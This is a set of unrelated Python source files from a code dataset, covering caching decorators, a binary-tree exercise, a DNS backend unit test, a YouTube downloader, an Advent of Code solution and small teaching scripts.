datetime\nimport json\n\n\ndef logging_decorator(func):\n def wrapper(**kwargs):\n import logging\n logging.info("Calling function {} with args {}".format(func.__name__, json.dumps(kwargs)))\n start = datetime.now()\n value = func(**kwargs)\n logging.info(\"Func returned {} in {}\".format(json.dumps(value), datetime.now()-start))\n return value\n return wrapper\n\n\ndef redis_decorator_expiry(expiry_time=0):\n\n def redis_handler(func):\n def wrapper(**kwargs):\n func_name = func.__name__\n key = func_name + json.dumps(kwargs)\n data = client.get(key)\n if data:\n return json.loads(data)\n else:\n data = func(**kwargs)\n client.setex(key, json.dumps(data), expiry_time)\n return data\n return wrapper\n return redis_handler","sub_path":"app_redis/app_redis/utils/cache_decorator.py","file_name":"cache_decorator.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"316281211","text":"# -*-coding:utf-8-*- \n\"\"\"\n@Author : llame\n@Software: PyCharm\n@Time : 2020/10/16 2:19 PM\n\"\"\" \n# Problem: given the results of a binary tree's preorder and inorder traversals, rebuild the binary tree.\n# Assume that the preorder and inorder traversal results contain no duplicate numbers.\n# For example, given the preorder sequence {1,2,4,7,3,5,6,8} and the inorder sequence {4,7,2,1,5,3,8,6}, rebuild the binary tree and return it.\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n # Return the root TreeNode of the constructed tree\n def reConstructBinaryTree(self, pre, tin):\n # write code here\n if len(pre)==0:\n return None\n root=TreeNode(pre[0])\n TinIndex=tin.index(pre[0])\n root.left=self.reConstructBinaryTree(pre[1:TinIndex+1], tin[0:TinIndex])\n root.right=self.reConstructBinaryTree(pre[TinIndex+1:], tin[TinIndex+1:])\n return root\n def PostTraversal(self,root): # post-order traversal\n if root != None:\n self.PostTraversal(root.left)\n self.PostTraversal(root.right)\n print(root.val)\npre=[1,2,4,7,3,5,6,8]\ntin=[4,7,2,1,5,3,8,6]\nS=Solution()\nroot=S.reConstructBinaryTree(pre,tin)\nS.PostTraversal(root)\n\n","sub_path":"algorithm/37-已知二叉树前序中序求后序遍历.py","file_name":"37-已知二叉树前序中序求后序遍历.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"40776374","text":"# Copyright (C) 2013 eNovance SAS \n#\n# Author: Artom Lifshitz \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport eventlet\nimport os\nimport socket\nimport ssl\nfrom designate import exceptions\nfrom designate.tests.test_backend import BackendTestCase\nfrom mock import MagicMock\n# impl_nsd4slave needs to register its options before being instantiated.\n# Import it and pretend to use it to avoid flake8 unused import errors.\nfrom designate.backend import impl_nsd4slave\nimpl_nsd4slave\n\n\nclass NSD4ServerStub:\n recved_command = None\n response = 'ok'\n keyfile = os.path.join(os.path.dirname(__file__), 'nsd_server.key')\n certfile = os.path.join(os.path.dirname(__file__), 'nsd_server.pem')\n\n def handle(self, client_sock, client_addr):\n stream = client_sock.makefile()\n self.recved_command = stream.readline()\n stream.write(self.response)\n stream.flush()\n\n def start(self):\n self.port = 1025\n while True:\n try:\n eventlet.spawn_n(eventlet.serve,\n eventlet.wrap_ssl(\n eventlet.listen(('127.0.0.1', self.port)),\n keyfile=self.keyfile,\n certfile=self.certfile,\n server_side=True),\n self.handle)\n break\n except socket.error:\n self.port = self.port + 1\n\n def stop(self):\n eventlet.StopServe()\n\n\nclass NSD4SlaveBackendTestCase(BackendTestCase):\n __test__ = True\n\n def setUp(self):\n super(NSD4SlaveBackendTestCase, self).setUp()\n self.servers = [NSD4ServerStub(), NSD4ServerStub()]\n [server.start() for server in self.servers]\n impl_nsd4slave.DEFAULT_PORT = self.servers[0].port\n self.config(backend_driver='nsd4slave', group='service:agent')\n self.config(\n servers=['127.0.0.1', '127.0.0.1:%d' % self.servers[1].port],\n group='backend:nsd4slave')\n keyfile = os.path.join(os.path.dirname(__file__), 'nsd_control.key')\n certfile = os.path.join(os.path.dirname(__file__), 'nsd_control.pem')\n self.config(keyfile=keyfile, group='backend:nsd4slave')\n self.config(certfile=certfile, group='backend:nsd4slave')\n self.config(pattern='test-pattern', group='backend:nsd4slave')\n self.nsd4 = self.get_backend_driver()\n\n def tearDown(self):\n super(NSD4SlaveBackendTestCase, self).tearDown()\n [server.stop() for server in self.servers]\n\n def test_create_domain(self):\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.nsd4.create_domain(context, domain)\n command = 'NSDCT1 addzone %s test-pattern\\n' % domain['name']\n [self.assertEqual(server.recved_command, command)\n for server in self.servers]\n\n def test_delete_domain(self):\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.nsd4.delete_domain(context, domain)\n command = 'NSDCT1 delzone %s\\n' % domain['name']\n [self.assertEqual(server.recved_command, command)\n for server in self.servers]\n\n def test_server_not_ok(self):\n self.servers[0].response = 'goat'\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.assertRaises(exceptions.NSD4SlaveBackendError,\n self.nsd4.create_domain,\n context, domain)\n\n def test_ssl_error(self):\n self.nsd4._command = MagicMock(side_effect=ssl.SSLError)\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.assertRaises(exceptions.NSD4SlaveBackendError,\n self.nsd4.create_domain,\n context, domain)\n\n def test_socket_error(self):\n self.nsd4._command = MagicMock(side_effect=socket.error)\n context = self.get_context()\n domain = self.get_domain_fixture()\n self.assertRaises(exceptions.NSD4SlaveBackendError,\n self.nsd4.create_domain,\n context, 
domain)\n","sub_path":"designate/tests/test_backend/test_nsd4slave.py","file_name":"test_nsd4slave.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"260354144","text":"import pickle\nimport os\nfileDir = os.path.dirname(os.path.realpath(__file__))\nfacelistDir = os.path.join(fileDir,\"facelist.p\")\n\nfacelist = {'Lucas':'person-1','Tapan':'person-2','Daniel':'person-3',\n 'Deepali':'person-4','Yodar':'person-5','Sean':'person-6',\n 'Salasky':'person-7','Qiming':'person-8','Alex':'person-9','Unknown':'Unknown'}\n\npickle.dump(facelist, open(facelistDir, \"wb\"))\n","sub_path":"faceclassifier_recoverpickle.py","file_name":"faceclassifier_recoverpickle.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"325052275","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('projects', '0005_project_main_caption'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='project',\n name='main_alt_tag',\n field=models.CharField(default='I am an alt tag. Please replace me.', max_length=200),\n preserve_default=False,\n ),\n ]\n","sub_path":"projects/migrations/0006_project_main_alt_tag.py","file_name":"0006_project_main_alt_tag.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"14541128","text":"import datetime\n\n\"\"\"\nClass hierarchy\n______________________________________________________\n\n Person\n |\n MITPerson\n |\n _________________________\n | | \n Student Professor\n |\n _______________________________\n | | |\n UG TransferStudent Grad\n\n\"\"\"\n\n\nclass Person(object):\n def __init__(self, name):\n \"\"\" Create person called name \"\"\"\n self.name = name\n self.birthday = None\n\n # assumes space is between first and last name - extract last name\n self.lastName = name.split(' ')[-1]\n\n def getLastName(self):\n \"\"\" Return last name \"\"\"\n return self.lastName\n\n def setBirthday(self, month, day, year):\n \"\"\" Sets self's birthday to birthDate\"\"\"\n self.birthday = datetime.date(year, month, day)\n\n def getAge(self):\n \"\"\" Returns self's current age in days \"\"\"\n if self.birthday is None:\n raise ValueError(\"No birthdate set\")\n return (datetime.date.today() - self.birthday).days\n\n def __lt__(self, other): # custom less than methond\n \"\"\" Returns True if self's name is < other's name, and False otherwise \"\"\"\n if self.lastName == other.lastName:\n return (self.name < other.name)\n return (self.lastName < other.lastName)\n\n def __str__(self):\n \"\"\" Return self's name \"\"\"\n return self.name\n\n\nclass MITPerson(Person):\n nextIDNum = 0 # next ID number to assign\n\n def __init__(self, name):\n Person.__init__(self, name) # initialize Person attribs\n self.idNum = MITPerson.nextIDNum # MITPerson attribute: unique ID\n MITPerson.nextIDNum += 1\n\n def getIdNum(self):\n return self.idNum\n\n def speak(self, utterance):\n return (self.name + \" says: \" + utterance)\n\n # Sorting MIT People user their ID number, not name\n def __lt__(self, other):\n return self.idNum < other.idNum\n\n\nclass Professor(MITPerson):\n def __init__(self, name, department):\n MITPerson.__init__(self, name)\n self.department = department\n\n def speak(self, 
utterance):\n new = 'In course ' + self.department + ' we say '\n return MITPerson.speak(self, new + utterance)\n\n def lecture(self, topic):\n return self.speak(\"It is obvious that \" + topic)\n\n\n# create new superclass that covers all students\nclass Student(MITPerson):\n pass\n\n\nclass UG(Student):\n def __init__(self, name, classYear):\n MITPerson.__init__(self, name)\n self.year = classYear\n\n def getClass(self):\n return self.year\n\n def speak(self, utterance):\n return (MITPerson.speak(self, \"Yo Bro, \" + utterance))\n\n\nclass Grad(Student):\n pass\n\n\nclass TransferStudent(Student):\n pass\n\n\ndef isStudent(obj):\n return isinstance(obj, Student)\n\n\nclass Grades(object):\n \"\"\"A mapping from students to a list of grades\"\"\"\n\n def __init__(self):\n \"\"\"Create empty grade book\"\"\"\n self.students = [] # list of Student objects\n self.grades = {} # maps idNum -> list of grades\n self.isSorted = True # true if self.students is sorted\n\n def addStudent(self, student):\n \"\"\"\n Assumes: student is of type Student\n Add student to the grade book\n \"\"\"\n if student in self.students:\n raise ValueError('Duplicate student')\n self.students.append(student)\n self.grades[student.getIdNum()] = []\n self.isSorted = False\n\n def addGrade(self, student, grade):\n \"\"\"\n Assumes: grade is a float\n Add grade to the list of grades for a student\n \"\"\"\n try:\n # index into dict using IdNum; returns list of grades\n # then mutates self.grades with added grade\n self.grades[student.getIdNum()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in grade book\")\n\n def getGrades(self, student):\n \"\"\" Return a list of grades for student \"\"\"\n try: # return copy of student's grades\n # index into dict using IdNum, then return a copy [:]\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError(\"Student not in grade book\")\n\n # USING GENERATOR CONSTRUCT\n def allStudents(self):\n \"\"\" Yield the students in the grade book, in sorted order \"\"\"\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n # return self.students[:]\n for s in self.students:\n yield s # generator\n\n\n\ndef gradeReport(course):\n \"\"\"Assumes: course is of type grades\"\"\"\n report = []\n for s in course.allStudents():\n tot = 0.0\n numGrades = 0\n for g in course.getGrades(s):\n tot += g\n numGrades += 1\n try:\n average = tot/numGrades\n report.append(str(s) + '\\'s mean grade is '\n + str(average))\n except ZeroDivisionError:\n report.append(str(s) + ' has no grades')\n return '\\n'.join(report)\n\n# def gradeReport(course):\n# \"\"\" Assumes: course is of type grades \"\"\"\n# report = []\n# for s in course.allStudents():\n# tot = 0.0\n# numGrades = 0\n\n# for g in course.getGrades(s):\n# tot += g\n# numGrades += 1\n\n# try:\n# average = tot / numGrades\n# report.append(str(s) + '\\'s mean grade is ' + str(average))\n\n# except ZeroDivisionError:\n# report.append(str(s) + ' has no grades')\n\n# return ('\\n'.join)\n\n\nug1 = UG('Matt Damon', 2018)\nug2 = UG('Ben Affleck', 2019)\nug3 = UG('Drew Houston', 2017)\nug4 = UG('Mark Zuckerberg', 2017)\ng1 = Grad('Bill Gates')\ng2 = Grad('Steve Wozniak')\n\nsix00 = Grades()\n\nsix00.addStudent(g1)\nsix00.addStudent(ug2)\nsix00.addStudent(ug1)\nsix00.addStudent(g2)\nsix00.addStudent(ug4)\nsix00.addStudent(ug3)\n\n\nsix00.addGrade(g1, 100)\nsix00.addGrade(g2, 25)\nsix00.addGrade(ug1, 95)\nsix00.addGrade(ug2, 85)\nsix00.addGrade(ug3, 75)\n\nfor e in six00.students:\n print 
(e)\n\nprint()\nprint(gradeReport(six00))\n\n\n\n# for s in six00.allStudents():\n# print (s.getGrades())","sub_path":"01_MIT_Learning/week_5/lectures_and_examples/Section 2/sec_2_generators_grade.py","file_name":"sec_2_generators_grade.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"39233333","text":"# Example 6-1\ndef sayHello(): # function definition\n print(\"Hello World!\") # function body\n\n\nsayHello() # function call\n\n\n# Example 6-2\ndef sayHello1(s): # function definition\n print(s) # function body\n\n\nsayHello1(\"Hello!\") # function call\nsayHello1(\"How are you?\")\n\n\n# Example 6-3\ndef fac(num):\n if num == 1:\n return 1\n elif num < 1:\n return 0\n else:\n ret = 1\n while num > 1:\n ret *= num\n num -= 1\n return ret\n\n\nprint(6, \"!=\", fac(6), sep=\"\")\nprint(16, \"!=\", fac(16), sep=\"\")\nprint(26, \"!=\", fac(26), sep=\"\")\nprint(0, \"!=\", fac(0), sep=\"\")\nprint(1, \"!=\", fac(1), sep=\"\")\n","sub_path":"SXB/venv/函数/函数的定义.py","file_name":"函数的定义.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"455864164","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n Pytube interaction module\n\n\"\"\"\nimport os\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pytube.exceptions import PytubeError\nfrom pytube import YouTube, Playlist\nfrom colorama import init, Fore\n\nimport yt_links\nimport yt_graphics\nimport yt_files\n\ninit(autoreset=True)\n\nOLD_PERCENT: int = 0\nTOTAL_MBS: int = 0\nTOTAL_FILES: int = 0\nCURRENT_URL: str = ''\nCURRENT_FILENAME: str = ''\n\"\"\"\nOLD_PERCENT - variable, previous value of downloaded percent. Used to avoid constant\n reprinting of the status on each new chunk of file. Used by callback\n function \"progress_call\"\n\nTOTAL_MBS - variable, total downloaded mbs. Used by callback function \"complete_call\"\n\nTOTAL_FILES - variable, total downloaded files. 
Used by callback function \"complete_call\"\n\nCURRENT_URL - variable, url for the file we're downloading right now.\n Used by callback function \"complete_call\"\n\nCURRENT_FILENAME - variable, name for the file we're downloading right now.\n Used by callback function \"complete_call\"\n\"\"\"\n\n\ndef download_all(links: list):\n \"\"\"\n Proxy for download_video()\n \"\"\"\n links.sort(key=len)\n total = len(links)\n yt_files.hide_cursor()\n for i, outer_link in enumerate(links, start=1):\n if 'list=' in outer_link:\n inner_links = unfold_playlist(outer_link)\n\n if inner_links:\n request = requests.get(outer_link)\n soup = BeautifulSoup(request.text, 'html.parser')\n title_name = soup.find(\"title\")\n if title_name:\n title = title_name.text\n title = title.replace(' - YouTube', '')\n else:\n title = ''\n\n if i > 1:\n print()\n\n sub_total = len(inner_links)\n print(Fore.MAGENTA + f'Downloading from playlist: {Fore.WHITE + title}')\n print(Fore.MAGENTA + f'{outer_link[0:80]}')\n\n item = yt_files.Record('', outer_link[23:], '!start!', title)\n yt_files.cut_lines(item)\n\n for j, inner_link in enumerate(inner_links, start=1):\n download_video(j, sub_total, inner_link)\n\n item = yt_files.Record('', outer_link, '!complete!', title)\n yt_files.cut_lines(item)\n\n print(Fore.MAGENTA + f'Complete: {len(inner_links)} files')\n if i < len(links):\n print()\n else:\n print('\\n' + Fore.RED + f'Inner links of the playlist are unreachable:')\n print(Fore.RED + outer_link + '\\n')\n else:\n download_video(i, total, outer_link)\n\n\ndef download_video(num: int, total: int, url: str):\n \"\"\"\n Main downloading function\n \"\"\"\n global CURRENT_URL, CURRENT_FILENAME\n\n parameters = {'num': num, 'end': total, 'url': url, 'size': 0, 'percents': 0, 'filename': ''}\n yt_graphics.set_parameters(parameters)\n\n for attempt in range(1, 11): # maximum 10 attempts\n try:\n youtube = YouTube(url=url)\n stream = youtube.streams.filter(progressive=True, file_extension=\"mp4\").first()\n break\n except (PytubeError, ConnectionError):\n yt_graphics.unable_to_reach(attempt)\n time.sleep(1)\n else:\n yt_graphics.unaviable()\n yt_files.cut_lines(yt_files.Record('', url, '[unaviable]', 'Unknown'))\n return\n\n safe_name = 'video_' + str(url[32:]).upper() + '.mp4'\n filename = yt_links.defuse_name(stream.default_filename, safe_name)\n\n parameters = {'num': num, 'end': total, 'url': url, 'size': stream.filesize,\n 'percents': 0, 'filename': filename}\n\n CURRENT_URL = url\n CURRENT_FILENAME = filename\n yt_graphics.set_parameters(parameters)\n\n youtube.register_on_progress_callback(progress_call)\n youtube.register_on_complete_callback(complete_call)\n\n path = yt_files.SAVE_PATH\n if os.path.isfile(path + filename) and os.path.getsize(path + filename) == stream.filesize:\n yt_graphics.call_status_for_already_exist()\n yt_files.cut_lines(yt_files.Record('', url, '[ exist ]', filename))\n else:\n try:\n stream.download(path, filename[0:-4])\n except OSError as error:\n print(Fore.RED + f'Unable to save file: {filename}')\n print(Fore.RED + f'Reason: [{error.strerror}][{error.errno}] - [{error.args}]')\n return\n\n\ndef unfold_playlist(playlist_link):\n \"\"\"\n Get inner links of the playlist from the youtube\n \"\"\"\n inner_links = []\n for _ in range(1, 11): # maximum 10 attempts\n try:\n inner_links = Playlist(playlist_link).parse_links()\n break\n except PytubeError:\n time.sleep(1) # let's try again after 1 second\n\n return inner_links\n\n\ndef complete_call(stream=None, file_handle=None):\n \"\"\"\n Gets 
called from pytube on finished download\n \"\"\"\n global TOTAL_FILES, TOTAL_MBS\n\n TOTAL_FILES += 1\n TOTAL_MBS += stream.filesize / 1024 / 1024\n\n yt_graphics.call_status_for_complete()\n item = yt_files.Record('', new_url=CURRENT_URL, message='!complete!', name=CURRENT_FILENAME)\n yt_files.cut_lines(item)\n\n\ndef progress_call(stream=None, chunk=None, file_handle=None, remaining=None):\n \"\"\"\n Gets called from pytube on every new chunk of file\n \"\"\"\n global OLD_PERCENT\n\n complete_bytes = file_handle.tell()\n total_bytes = remaining + complete_bytes\n new_percents = int((complete_bytes / total_bytes) * 100)\n\n if OLD_PERCENT == new_percents:\n # refresh only on changes\n return\n\n OLD_PERCENT = new_percents\n yt_graphics.call_status_for_progres(new_percents)\n","sub_path":"yt_youtube.py","file_name":"yt_youtube.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"288575872","text":"import math\nimport typing\nfrom collections import Counter, defaultdict\nfrom dataclasses import dataclass\nfrom typing import Dict, List, NamedTuple\n\nfrom adventofcode2019.utils.abstract import FileReaderSolution\n\n\nclass Chemical(NamedTuple):\n consumable: int\n name: str\n\n\nclass Recipe(NamedTuple):\n inputs: List[Chemical]\n output: Chemical\n\n @staticmethod\n def parse_recipe_string(input_string: str) -> \"Recipe\":\n \"\"\"Parse a string as a Recipe and return a new Recipe.\n\n :param input_string: Input string, for example \"1 A, 2 B, 3 C => 2 D\"\n :return Recipe object\n \"\"\"\n inputs, outputs = input_string.strip().split(\" => \")\n\n input_parts = inputs.split(\",\")\n\n input_chemicals = []\n\n for input_part in input_parts:\n consumable, name = input_part.strip().split(\" \")\n input_chemicals.append(\n Chemical(consumable=int(consumable), name=name.strip())\n )\n\n consumable, name = outputs.split(\" \")\n output_chemical = Chemical(consumable=int(consumable), name=name)\n\n new_recipe = Recipe(inputs=input_chemicals, output=output_chemical)\n return new_recipe\n\n\n@dataclass\nclass Node:\n name: str\n edges: list\n\n def __init__(self, name: str):\n self.name = name\n self.edges = []\n\n def add_edge(self, node: \"Node\"):\n self.edges.append(node)\n\n\nclass NanoFactory:\n warehouse: defaultdict\n recipes: Dict[str, Recipe]\n\n def __init__(self):\n self.warehouse = defaultdict(int)\n self.recipes = {}\n\n def read_input(self, input_lines: str):\n for line in input_lines.splitlines():\n recipe = Recipe.parse_recipe_string(line)\n self.recipes[recipe.output.name] = recipe\n\n def _get_requirement_for_one(self, output: str, n: int) -> Dict[str, int]:\n \"\"\"Compute what we need for `n` units of `output` and return this as a Dict.\n For example, with the recipe `4 C, 1 A => 1 CA`, when we need 4 of `CA`, return\n {\"C\": 16, \"A\": 4}\n \"\"\"\n result = {}\n output_recipe = self.recipes.get(output)\n if output_recipe:\n # We can only create multiples, e.g. if the multiple is 10, and `n` is 15,\n # we have to create 20 units.\n multiple_required = output_recipe.output.consumable\n number_needed = math.ceil(n / multiple_required)\n\n for input_recipe in output_recipe.inputs:\n result[input_recipe.name] = input_recipe.consumable * number_needed\n return result\n\n def dep_resolve(self, node: Node, resolved: List, unresolved: List):\n \"\"\"\n Resolve the order in which we need to process our recipe.\n Checks for circular dependencies ( A->B->C->A )\n Code from 
https://www.electricmonk.nl\n\n :param node: Root node\n :param resolved: List of resolved nodes\n :param unresolved: List of unresolved nodes\n :return:\n \"\"\"\n unresolved.append(node)\n for edge in node.edges:\n if edge not in resolved:\n if edge in unresolved:\n raise Exception(\n f\"Circular reference detected: {node.name} -> {edge.name}\"\n )\n self.dep_resolve(edge, resolved, unresolved)\n resolved.append(node)\n unresolved.remove(node)\n\n def create_nodes(self) -> Node:\n \"\"\"\n Create all the `Node` instances for the current recipes and return the\n root_node with all the children in the Edges\n \"\"\"\n nodes = {}\n root_node: Node\n # First, create the nodes\n for key, recipe in self.recipes.items():\n node = Node(key)\n nodes[key] = node\n if key == \"FUEL\":\n root_node = node\n\n # Since ORE isn't really output but the result, we add it by hand\n nodes[\"ORE\"] = Node(\"ORE\")\n\n # Next, create all the Edges\n for key, recipe in self.recipes.items():\n for input_recipe in recipe.inputs:\n input_recipe_node = nodes[input_recipe.name]\n nodes[key].add_edge(input_recipe_node)\n\n return root_node\n\n def resolve_tree(self) -> List[Node]:\n \"\"\" Resolve the tree and return a list of nodes in order to process them.\"\"\"\n root_node = self.create_nodes()\n resolved: List[Node] = []\n self.dep_resolve(root_node, resolved, [])\n return resolved\n\n def ore_needed_for_n_fuel(self, n=1) -> int:\n \"\"\" Compute how many ORE we need for `n` fuel object\"\"\"\n # Do a recursive walk from FUEL to ORE\n resolved = self.resolve_tree()\n\n counter: typing.Counter = Counter()\n # See what we need. We need to start reversed, because we do not know how many\n # ORE we need for 1 FUEL\n for node in reversed(resolved):\n if len(node.edges) == 0:\n # ORE doesn't need anything\n continue\n\n if node.name == \"FUEL\":\n qty = n\n else:\n qty = counter[node.name]\n\n requirements_for_node = self._get_requirement_for_one(node.name, qty)\n counter.update(requirements_for_node)\n\n return counter[\"ORE\"]\n\n\nclass Day14:\n pass\n\n\nclass Day14PartA(Day14, FileReaderSolution):\n def solve(self, input_data: str) -> int:\n factory = NanoFactory()\n factory.read_input(input_data)\n ore = factory.ore_needed_for_n_fuel()\n return ore\n\n\nclass Day14PartB(Day14, FileReaderSolution):\n def binary_search(\n self, search: int = 1_000_000_000_000, factory: NanoFactory = None\n ) -> int:\n \"\"\"\n Implement a binary search to search for the magic number\n :param search: The number we want to hit\n :param factory: The NanoFactory that generates the ore\n :return: Number of `fuel` that can be created from `search` ore.\n \"\"\"\n if not factory:\n return -1\n\n low = 1\n middle = 0\n high = search\n found = False\n ore_needed = 0\n\n while low < high and not found:\n middle = (low + high + 1) // 2\n ore_needed = factory.ore_needed_for_n_fuel(middle)\n if ore_needed == search:\n return middle\n else:\n if search < ore_needed:\n high = middle - 1\n else:\n low = middle\n\n # Our result may not overshoot the search, remove one if too high\n if ore_needed > search:\n middle -= 1\n return middle\n\n def solve(self, input_data: str) -> int:\n factory = NanoFactory()\n factory.read_input(input_data)\n res = 1_000_000_000_000\n\n res = self.binary_search(res, factory)\n return res\n","sub_path":"src/adventofcode2019/solutions/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 
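The day14.py record above resolves recipe order with a depth-first dependency walk (dep_resolve) that raises on circular references, then consumes the nodes in reverse. A minimal standalone sketch of that resolution technique follows; the names here are invented for illustration and are not taken from the record.

class Node:
    def __init__(self, name):
        self.name = name
        self.edges = []  # nodes this node depends on

def resolve(node, resolved, unresolved):
    # Append a node to `resolved` only after everything it depends on is resolved.
    unresolved.append(node)
    for edge in node.edges:
        if edge not in resolved:
            if edge in unresolved:
                # Reaching a node that is still being resolved means a cycle.
                raise ValueError("Circular reference: %s -> %s" % (node.name, edge.name))
            resolve(edge, resolved, unresolved)
    resolved.append(node)
    unresolved.remove(node)

# FUEL depends on WATER, which depends on ORE.
fuel, water, ore = Node("FUEL"), Node("WATER"), Node("ORE")
fuel.edges.append(water)
water.edges.append(ore)
order = []
resolve(fuel, order, [])
print([n.name for n in order])  # ['ORE', 'WATER', 'FUEL'] - dependencies first

Iterating this order in reverse (as ore_needed_for_n_fuel does) visits FUEL before its ingredients, so the required quantity of each chemical is known before its own recipe is expanded.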
+{"seq_id":"631352214","text":"from pay_py.alipay_mobile_web import Utils\nfrom pay_py import constants\n\ndef alipay_web():\n from pay_py import alipay_mobile_web\n client = alipay_mobile_web.Client(\n constants.partner,\n constants.partner,\n constants.key,\n '../pay_py/cacert_mobile_web.pem',\n )\n pay_url = client.generate_request_url(\n 'notify_url',\n 'return_url',\n Utils.create_out_trade_no(),\n 'subject',\n '0.01',\n 'show_url'\n )\n\n print(pay_url)\n\n\nif __name__ == '__main__':\n alipay_web()","sub_path":"samples/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"275439179","text":"#Writen by: Michael Eckrote\r\n#\r\n# This program is going to accept some input about distance and\r\n# time, and will use that info to determine all sorts of cool things!\r\n\r\n# This container hold how many feet are in various distances\r\ndistance_key_feet = {\r\n 'inch': 1/12, 'Inch': 1/12, 'inches': 1/12, 'Inches': 1/12,\r\n 'Feet': 1, 'feet': 1, 'foot': 1, 'Foot': 1,\r\n 'yard': 3, 'Yard': 3, 'yards': 3, 'Yards': 3,\r\n 'Mile': 5280, 'mile': 5280, 'Miles': 5280, 'miles': 5280,\r\n 'kilometers': 3280.84, 'Kilometers': 3280.84, 'kilometer': 3280.84,'Kilometer': 3280.84,\r\n 'meter': 3.28084, 'Meter': 3.28084, 'meters': 3.28084, 'Meters': 3.28084,\r\n 'centimeter': 0.0328084, 'Centimeter': 0.0328084, 'centimeters': 0.0328084, 'Centimeters': 0.0328084,\r\n 'millimeter': 0.00328084, 'Millimeter': 0.00328084, 'Millimeters': 0.00328084, 'millimeters': 0.00328084\r\n}\r\n\r\n# This container holds how many hours are in various units of time\r\ntime_key_hours = {\r\n 'seconds': 0.000277778, 'Seconds': 0.000277778, 'second': 0.000277778, 'Second': 0.000277778, 'sec': 0.000277778, 'secs': 0.000277778, 'Sec': 0.000277778, 'Secs': 0.000277778,\r\n 'minutes': 0.0166667, 'Minutes': 0.0166667, 'minute': 0.0166667, 'Minute': 0.0166667, 'min': 0.0166667, 'Min': 0.0166667, 'mins': 0.0166667, 'Mins': 0.0166667,\r\n 'hour': 1, 'Hour': 1, 'hours': 1, 'Hours': 1,\r\n 'day': 24, 'Day': 24, 'days': 24, 'Days': 24,\r\n 'year': 8760, 'Year': 8760, 'years': 8760, 'Years': 8760\r\n}\r\n\r\n# The section asks the user for all the required info (5 prompts)\r\n\r\n# 1\r\nchosen_location = input(\r\n 'Think of a location you travel\\n'\r\n 'to every day; preferable somewhere\\n'\r\n 'close like work or school:\\n'\r\n ''\r\n)\r\nprint('')\r\n\r\n#2\r\ndistance_to_location = float(input(\r\n 'Enter the distance you travel\\n'\r\n 'going to %s in whatever unit of\\n'\r\n 'measurement that you want (numbers only):\\n'\r\n '' % chosen_location\r\n))\r\nprint('')\r\n\r\n#3\r\nchosen_unit_of_distance = input(\r\n 'Enter the unit of distance you chose\\n'\r\n 'ex - miles, feet, kilometers:\\n'\r\n ''\r\n)\r\nprint('')\r\n\r\n#4\r\ntime_to_location = float(input(\r\n 'Enter the time it takes to travel\\n'\r\n 'to %s in whatever unit of measurement\\n'\r\n 'that you want (numbers only):\\n'\r\n '' % chosen_location\r\n))\r\nprint('')\r\n\r\n#5\r\nchosen_unit_of_time = input(\r\n 'Enter the unit of time you chose\\n'\r\n 'ex- seconds, minutes, hours:\\n'\r\n ''\r\n)\r\nprint('')\r\n\r\n# These next 2 lines convert any input into miles and hours, and then MPH\r\ndistance_to_location_in_miles = (distance_key_feet[chosen_unit_of_distance] * distance_to_location) / 5280\r\ntime_to_location_in_hours = time_key_hours[chosen_unit_of_time] * time_to_location\r\nmph_to_location = distance_to_location_in_miles / 
